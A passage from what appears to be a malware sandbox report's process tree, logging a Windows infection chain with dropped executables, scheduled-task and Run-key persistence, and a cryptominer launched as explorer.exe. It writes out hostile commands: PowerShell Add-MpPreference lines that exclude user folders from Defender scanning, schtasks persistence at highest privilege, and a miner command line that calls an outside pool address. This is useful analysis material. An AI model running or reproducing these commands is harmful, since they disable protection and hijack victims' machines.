                                                                • C:\Windows\SysWOW64\chcp.com
                                                                  chcp 65001
                                                                  4⤵
                                                                    PID:1348
                                                                  • C:\Program Files (x86)\Windows Media Player\Network Sharing\conhost.exe
                                                                    "C:\Program Files (x86)\Windows Media Player\Network Sharing\conhost.exe"
                                                                    4⤵
                                                                      PID:7636
                                                                • C:\Program Files\Load.exe
                                                                  "C:\Program Files\Load.exe"
                                                                  2⤵
                                                                  • Executes dropped EXE
                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                  PID:3376
                                                                  • C:\ProgramData\NetTool\Manager.exe
                                                                    "C:\ProgramData\NetTool\Manager.exe"
                                                                    3⤵
                                                                    • Executes dropped EXE
                                                                    PID:7620
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp4E01.tmp.bat""
                                                                      4⤵
                                                                        PID:8180
                                                                        • C:\Users\Admin\AppData\Roaming\DrivxxxxdcerInxsa6tllServ.exe
                                                                          "C:\Users\Admin\AppData\Roaming\DrivxxxxdcerInxsa6tllServ.exe"
                                                                          5⤵
                                                                          • Executes dropped EXE
                                                                          PID:2604
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "DrivxxxxdcerInxsa6tllServ" /tr '"C:\Users\Admin\AppData\Roaming\DrivxxxxdcerInxsa6tllServ.exe"' & exit
                                                                        4⤵
                                                                          PID:8160
                                                                      • C:\ProgramData\NetTool\Log.exe
                                                                        "C:\ProgramData\NetTool\Log.exe"
                                                                        3⤵
                                                                          PID:7648
                                                                        • C:\ProgramData\NetTool\SRVSTool.exe
                                                                          "C:\ProgramData\NetTool\SRVSTool.exe"
                                                                          3⤵
                                                                          • Executes dropped EXE
                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                          • Suspicious use of SetWindowsHookEx
                                                                          PID:7684
                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                            "schtasks" /create /tn "WinRar" /sc ONLOGON /tr "C:\ProgramData\NetTool\SRVSTool.exe" /rl HIGHEST /f
                                                                            4⤵
                                                                            • Creates scheduled task(s)
                                                                            PID:8060
                                                                        • C:\ProgramData\NetTool\SRVST3ool.exe
                                                                          "C:\ProgramData\NetTool\SRVST3ool.exe"
                                                                          3⤵
                                                                            PID:7704
                                                                            • C:\Windows\system32\cmd.exe
                                                                              "C:\Windows\system32\cmd.exe" /c del C:\PROGRA~3\NetTool\SRVST3~1.EXE >> NUL
                                                                              4⤵
                                                                                PID:8136
                                                                            • C:\ProgramData\NetTool\SRVST3o1ol.exe
                                                                              "C:\ProgramData\NetTool\SRVST3o1ol.exe"
                                                                              3⤵
                                                                              • Executes dropped EXE
                                                                              PID:7712
                                                                              • C:\Windows\System32\cmd.exe
                                                                                "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Service09" /tr '"C:\Users\Admin\AppData\Local\Temp\Service09.exe"' & exit
                                                                                4⤵
                                                                                  PID:3172
                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                    schtasks /create /f /sc onlogon /rl highest /tn "Service09" /tr '"C:\Users\Admin\AppData\Local\Temp\Service09.exe"'
                                                                                    5⤵
                                                                                    • Creates scheduled task(s)
                                                                                    PID:6692
                                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                                                  "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                                                                  4⤵
                                                                                    PID:7988
                                                                                  • C:\Users\Admin\AppData\Local\Temp\Service09.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\Service09.exe"
                                                                                    4⤵
                                                                                      PID:7700
                                                                                      • C:\Windows\System32\cmd.exe
                                                                                        "C:\Windows\System32\cmd.exe" /c powershell -Command Add-MpPreference -ExclusionPath '%cd%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & exit & exit
                                                                                        5⤵
                                                                                          PID:7816
                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            powershell -Command Add-MpPreference -ExclusionPath 'C:\Program Files'
                                                                                            6⤵
                                                                                              PID:8084
                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
                                                                                              6⤵
                                                                                                PID:8092
                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
                                                                                                6⤵
                                                                                                • Executes dropped EXE
                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                PID:7636
                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
                                                                                                6⤵
                                                                                                  PID:2208
                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Service09" /tr '"C:\Users\Admin\AppData\Local\Temp\Service09.exe"' & exit
                                                                                                5⤵
                                                                                                  PID:3336
                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                    schtasks /create /f /sc onlogon /rl highest /tn "Service09" /tr '"C:\Users\Admin\AppData\Local\Temp\Service09.exe"'
                                                                                                    6⤵
                                                                                                    • Creates scheduled task(s)
                                                                                                    PID:7716
                                                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                                                                  "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                                                                                  5⤵
                                                                                                  • Drops file in Program Files directory
                                                                                                  PID:8112
                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                    "C:\Windows\System32\cmd.exe" /c powershell -Command Add-MpPreference -ExclusionPath '%cd%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & exit & exit
                                                                                                    6⤵
                                                                                                      PID:4020
                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        powershell -Command Add-MpPreference -ExclusionPath 'C:\Program Files'
                                                                                                        7⤵
                                                                                                          PID:6712
                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
                                                                                                          7⤵
                                                                                                            PID:7984
                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
                                                                                                            7⤵
                                                                                                              PID:3852
                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
                                                                                                              7⤵
                                                                                                                PID:7936
                                                                                                          • C:\Windows\explorer.exe
                                                                                                            C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=185.189.12.253:5454 --user=3443rg --pass= --cpu-max-threads-hint=40 --donate-level=5 --cinit-idle-wait=1 --cinit-idle-cpu=100 --nicehash --cinit-stealth
                                                                                                            5⤵
                                                                                                              PID:7692
                                                                                                        • C:\ProgramData\NetTool\SRVST3oo2l.exe
                                                                                                          "C:\ProgramData\NetTool\SRVST3oo2l.exe"
                                                                                                          3⤵
                                                                                                          • Executes dropped EXE
                                                                                                          PID:7772
                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                            "C:\Windows\System32\cmd.exe" /c powershell -Command Add-MpPreference -ExclusionPath '%cd%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & exit & exit
                                                                                                            4⤵
                                                                                                              PID:7964
                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                powershell -Command Add-MpPreference -ExclusionPath 'C:\Program Files'
                                                                                                                5⤵
                                                                                                                • Drops file in Program Files directory
                                                                                                                PID:8052
                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
                                                                                                                5⤵
                                                                                                                • Drops file in Program Files directory
                                                                                                                PID:7732
                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
                                                                                                                5⤵
                                                                                                                  PID:8112
                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
                                                                                                                  5⤵
                                                                                                                  • Drops file in Program Files directory
                                                                                                                  PID:3616
                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Service09" /tr '"C:\Users\Admin\AppData\Local\Temp\Service09.exe"' & exit
                                                                                                                4⤵
                                                                                                                  PID:8180
                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                    schtasks /create /f /sc onlogon /rl highest /tn "Service09" /tr '"C:\Users\Admin\AppData\Local\Temp\Service09.exe"'
                                                                                                                    5⤵
                                                                                                                    • Creates scheduled task(s)
                                                                                                                    PID:7936
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\Service09.exe
                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\Service09.exe"
                                                                                                                  4⤵
                                                                                                                    PID:3280
                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                      "C:\Windows\System32\cmd.exe" /c powershell -Command Add-MpPreference -ExclusionPath '%cd%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & exit & exit
                                                                                                                      5⤵
                                                                                                                        PID:7532
                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          powershell -Command Add-MpPreference -ExclusionPath 'C:\Program Files'
                                                                                                                          6⤵
                                                                                                                            PID:7964
                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
                                                                                                                            6⤵
                                                                                                                              PID:2208
                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
                                                                                                                              6⤵
                                                                                                                                PID:8016
                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
                                                                                                                                6⤵
                                                                                                                                  PID:8168
                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Service09" /tr '"C:\Users\Admin\AppData\Local\Temp\Service09.exe"' & exit
                                                                                                                                5⤵
                                                                                                                                  PID:3172
                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                    schtasks /create /f /sc onlogon /rl highest /tn "Service09" /tr '"C:\Users\Admin\AppData\Local\Temp\Service09.exe"'
                                                                                                                                    6⤵
                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                    PID:7772
                                                                                                                            • C:\ProgramData\NetTool\SRVST33ool.exe
                                                                                                                              "C:\ProgramData\NetTool\SRVST33ool.exe"
                                                                                                                              3⤵
                                                                                                                              • Modifies WinLogon for persistence
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Adds Run key to start application
                                                                                                                              • Drops file in System32 directory
                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                              PID:7788
                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                "schtasks" /create /tn "WMIADAP" /sc ONLOGON /tr "'C:\Windows\System32\wbem\wbemdisp\WMIADAP.exe'" /rl HIGHEST /f
                                                                                                                                4⤵
                                                                                                                                • Creates scheduled task(s)
                                                                                                                                PID:3344
                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                "schtasks" /create /tn "conhost" /sc ONLOGON /tr "'C:\Windows\System32\raserver\conhost.exe'" /rl HIGHEST /f
                                                                                                                                4⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                • Creates scheduled task(s)
                                                                                                                                PID:7648
                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                "schtasks" /create /tn "Dycaejuqepu" /sc ONLOGON /tr "'C:\Users\Default\Application Data\Dycaejuqepu.exe'" /rl HIGHEST /f
                                                                                                                                4⤵
                                                                                                                                • Creates scheduled task(s)
                                                                                                                                PID:8188
                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                "schtasks" /create /tn "AdvancedWindowsManager" /sc ONLOGON /tr "'C:\Recovery\4537d782-9a0d-11eb-a52e-c2ebb310cb62\AdvancedWindowsManager.exe'" /rl HIGHEST /f
                                                                                                                                4⤵
                                                                                                                                • Creates scheduled task(s)
                                                                                                                                PID:7568
                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\NetTool\ZUlXYNsiFA.bat"
                                                                                                                                4⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                PID:7660
                                                                                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                  ping -n 5 localhost
                                                                                                                                  5⤵
                                                                                                                                  • Runs ping.exe
                                                                                                                                  PID:7564
                                                                                                                                • C:\Windows\SysWOW64\chcp.com
                                                                                                                                  chcp 65001
                                                                                                                                  5⤵
                                                                                                                                    PID:7692
                                                                                                                                  • C:\Recovery\4537d782-9a0d-11eb-a52e-c2ebb310cb62\AdvancedWindowsManager.exe
                                                                                                                                    "C:\Recovery\4537d782-9a0d-11eb-a52e-c2ebb310cb62\AdvancedWindowsManager.exe"
                                                                                                                                    5⤵
                                                                                                                                      PID:7924
                                                                                                                                • C:\ProgramData\NetTool\SRVST3o4ol.exe
                                                                                                                                  "C:\ProgramData\NetTool\SRVST3o4ol.exe"
                                                                                                                                  3⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  PID:7840
                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                    "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Servic4es32" /tr '"C:\Users\Admin\AppData\Local\Temp\Servic4es32.exe"' & exit
                                                                                                                                    4⤵
                                                                                                                                      PID:3504
                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                        schtasks /create /f /sc onlogon /rl highest /tn "Servic4es32" /tr '"C:\Users\Admin\AppData\Local\Temp\Servic4es32.exe"'
                                                                                                                                        5⤵
                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                        PID:2316
                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\inc\sihost32.exe
                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Microsoft\inc\sihost32.exe"
                                                                                                                                      4⤵
                                                                                                                                        PID:8008
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Servic4es32.exe
                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\Servic4es32.exe"
                                                                                                                                        4⤵
                                                                                                                                          PID:8040
                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                            "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Servic4es32" /tr '"C:\Users\Admin\AppData\Local\Temp\Servic4es32.exe"' & exit
                                                                                                                                            5⤵
                                                                                                                                              PID:8096
                                                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                                                schtasks /create /f /sc onlogon /rl highest /tn "Servic4es32" /tr '"C:\Users\Admin\AppData\Local\Temp\Servic4es32.exe"'
                                                                                                                                                6⤵
                                                                                                                                                • Creates scheduled task(s)
                                                                                                                                                PID:3652
                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Microsoft\inc\sihost32.exe
                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Microsoft\inc\sihost32.exe"
                                                                                                                                              5⤵
                                                                                                                                                PID:8124
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\Servic4es32.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\Servic4es32.exe"
                                                                                                                                                  6⤵
                                                                                                                                                    PID:7968
                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Servic4es32" /tr '"C:\Users\Admin\AppData\Local\Temp\Servic4es32.exe"' & exit
                                                                                                                                                      7⤵
                                                                                                                                                        PID:7572
                                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                                          schtasks /create /f /sc onlogon /rl highest /tn "Servic4es32" /tr '"C:\Users\Admin\AppData\Local\Temp\Servic4es32.exe"'
                                                                                                                                                          8⤵
                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                          PID:1744
                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\inc\sihost32.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Microsoft\inc\sihost32.exe"
                                                                                                                                                        7⤵
                                                                                                                                                          PID:8032
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Servic4es32.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\Servic4es32.exe"
                                                                                                                                                            8⤵
                                                                                                                                                              PID:3636
                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Servic4es32" /tr '"C:\Users\Admin\AppData\Local\Temp\Servic4es32.exe"' & exit
                                                                                                                                                                9⤵
                                                                                                                                                                  PID:8000
                                                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                                                    schtasks /create /f /sc onlogon /rl highest /tn "Servic4es32" /tr '"C:\Users\Admin\AppData\Local\Temp\Servic4es32.exe"'
                                                                                                                                                                    10⤵
                                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                                    PID:2820
                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\inc\sihost32.exe
                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Microsoft\inc\sihost32.exe"
                                                                                                                                                                  9⤵
                                                                                                                                                                    PID:7928
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Servic4es32.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\Servic4es32.exe"
                                                                                                                                                                      10⤵
                                                                                                                                                                        PID:8036
                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Servic4es32" /tr '"C:\Users\Admin\AppData\Local\Temp\Servic4es32.exe"' & exit
                                                                                                                                                                          11⤵
                                                                                                                                                                            PID:7672
                                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                                              schtasks /create /f /sc onlogon /rl highest /tn "Servic4es32" /tr '"C:\Users\Admin\AppData\Local\Temp\Servic4es32.exe"'
                                                                                                                                                                              12⤵
                                                                                                                                                                              • Creates scheduled task(s)
                                                                                                                                                                              PID:8180
                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Microsoft\inc\sihost32.exe
                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Microsoft\inc\sihost32.exe"
                                                                                                                                                                            11⤵
                                                                                                                                                                              PID:4084
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Servic4es32.exe
                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\Servic4es32.exe"
                                                                                                                                                                                12⤵
                                                                                                                                                                                  PID:7808
                                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Servic4es32" /tr '"C:\Users\Admin\AppData\Local\Temp\Servic4es32.exe"' & exit
                                                                                                                                                                                    13⤵
                                                                                                                                                                                      PID:1664
                                                                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                        schtasks /create /f /sc onlogon /rl highest /tn "Servic4es32" /tr '"C:\Users\Admin\AppData\Local\Temp\Servic4es32.exe"'
                                                                                                                                                                                        14⤵
                                                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                                                        PID:188
                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\inc\sihost32.exe
                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Microsoft\inc\sihost32.exe"
                                                                                                                                                                                      13⤵
                                                                                                                                                                                        PID:3304
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\Servic4es32.exe
                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\Servic4es32.exe"
                                                                                                                                                                                          14⤵
                                                                                                                                                                                            PID:7708
                                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Servic4es32" /tr '"C:\Users\Admin\AppData\Local\Temp\Servic4es32.exe"' & exit
                                                                                                                                                                                              15⤵
                                                                                                                                                                                                PID:7544
                                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                  schtasks /create /f /sc onlogon /rl highest /tn "Servic4es32" /tr '"C:\Users\Admin\AppData\Local\Temp\Servic4es32.exe"'
                                                                                                                                                                                                  16⤵
                                                                                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                                                                                  PID:2836
                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\inc\sihost32.exe
                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Microsoft\inc\sihost32.exe"
                                                                                                                                                                                                15⤵
                                                                                                                                                                                                  PID:7852
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Servic4es32.exe
                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\Servic4es32.exe"
                                                                                                                                                                                                    16⤵
                                                                                                                                                                                                      PID:8028
                                                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Servic4es32" /tr '"C:\Users\Admin\AppData\Local\Temp\Servic4es32.exe"' & exit
                                                                                                                                                                                                        17⤵
                                                                                                                                                                                                          PID:8188
                                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                            schtasks /create /f /sc onlogon /rl highest /tn "Servic4es32" /tr '"C:\Users\Admin\AppData\Local\Temp\Servic4es32.exe"'
                                                                                                                                                                                                            18⤵
                                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                                            PID:1296
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\inc\sihost32.exe
                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Microsoft\inc\sihost32.exe"
                                                                                                                                                                                                          17⤵
                                                                                                                                                                                                            PID:7628
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Servic4es32.exe
                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\Servic4es32.exe"
                                                                                                                                                                                                              18⤵
                                                                                                                                                                                                                PID:4000
                                                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Servic4es32" /tr '"C:\Users\Admin\AppData\Local\Temp\Servic4es32.exe"' & exit
                                                                                                                                                                                                                  19⤵
                                                                                                                                                                                                                    PID:2264
                                                                                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                      schtasks /create /f /sc onlogon /rl highest /tn "Servic4es32" /tr '"C:\Users\Admin\AppData\Local\Temp\Servic4es32.exe"'
                                                                                                                                                                                                                      20⤵
                                                                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                                                                      PID:2900
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\inc\sihost32.exe
                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Microsoft\inc\sihost32.exe"
                                                                                                                                                                                                                    19⤵
                                                                                                                                                                                                                      PID:7964
                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Servic4es32.exe
                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\Servic4es32.exe"
                                                                                                                                                                                                                        20⤵
                                                                                                                                                                                                                          PID:7568
                                                                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Servic4es32" /tr '"C:\Users\Admin\AppData\Local\Temp\Servic4es32.exe"' & exit
                                                                                                                                                                                                                            21⤵
                                                                                                                                                                                                                              PID:1376
                                                                                                                                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                schtasks /create /f /sc onlogon /rl highest /tn "Servic4es32" /tr '"C:\Users\Admin\AppData\Local\Temp\Servic4es32.exe"'
                                                                                                                                                                                                                                22⤵
                                                                                                                                                                                                                                • Creates scheduled task(s)
                                                                                                                                                                                                                                PID:7652
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Microsoft\inc\sihost32.exe
                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Microsoft\inc\sihost32.exe"
                                                                                                                                                                                                                              21⤵
                                                                                                                                                                                                                                PID:2936
                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\Servic4es32.exe
                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\Servic4es32.exe"
                                                                                                                                                                                                                                  22⤵
                                                                                                                                                                                                                                    PID:7584
                                                                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Servic4es32" /tr '"C:\Users\Admin\AppData\Local\Temp\Servic4es32.exe"' & exit
                                                                                                                                                                                                                                      23⤵
                                                                                                                                                                                                                                        PID:856
                                                                                                                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                          schtasks /create /f /sc onlogon /rl highest /tn "Servic4es32" /tr '"C:\Users\Admin\AppData\Local\Temp\Servic4es32.exe"'
                                                                                                                                                                                                                                          24⤵
                                                                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                                                                          PID:7816
                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\inc\sihost32.exe
                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Microsoft\inc\sihost32.exe"
                                                                                                                                                                                                                                        23⤵
                                                                                                                                                                                                                                          PID:3872
                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Servic4es32.exe
                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\Servic4es32.exe"
                                                                                                                                                                                                                                            24⤵
                                                                                                                                                                                                                                              PID:7676
                                                                                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Servic4es32" /tr '"C:\Users\Admin\AppData\Local\Temp\Servic4es32.exe"' & exit
                                                                                                                                                                                                                                                25⤵
                                                                                                                                                                                                                                                  PID:8032
                                                                                                                                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                    schtasks /create /f /sc onlogon /rl highest /tn "Servic4es32" /tr '"C:\Users\Admin\AppData\Local\Temp\Servic4es32.exe"'
                                                                                                                                                                                                                                                    26⤵
                                                                                                                                                                                                                                                    • Modifies WinLogon for persistence
                                                                                                                                                                                                                                                    • Adds Run key to start application
                                                                                                                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                                                                                                                    PID:7788
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\inc\sihost32.exe
                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Microsoft\inc\sihost32.exe"
                                                                                                                                                                                                                                                  25⤵
                                                                                                                                                                                                                                                    PID:2380
                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Servic4es32.exe
                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\Servic4es32.exe"
                                                                                                                                                                                                                                                      26⤵
                                                                                                                                                                                                                                                        PID:7656
                                                                                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
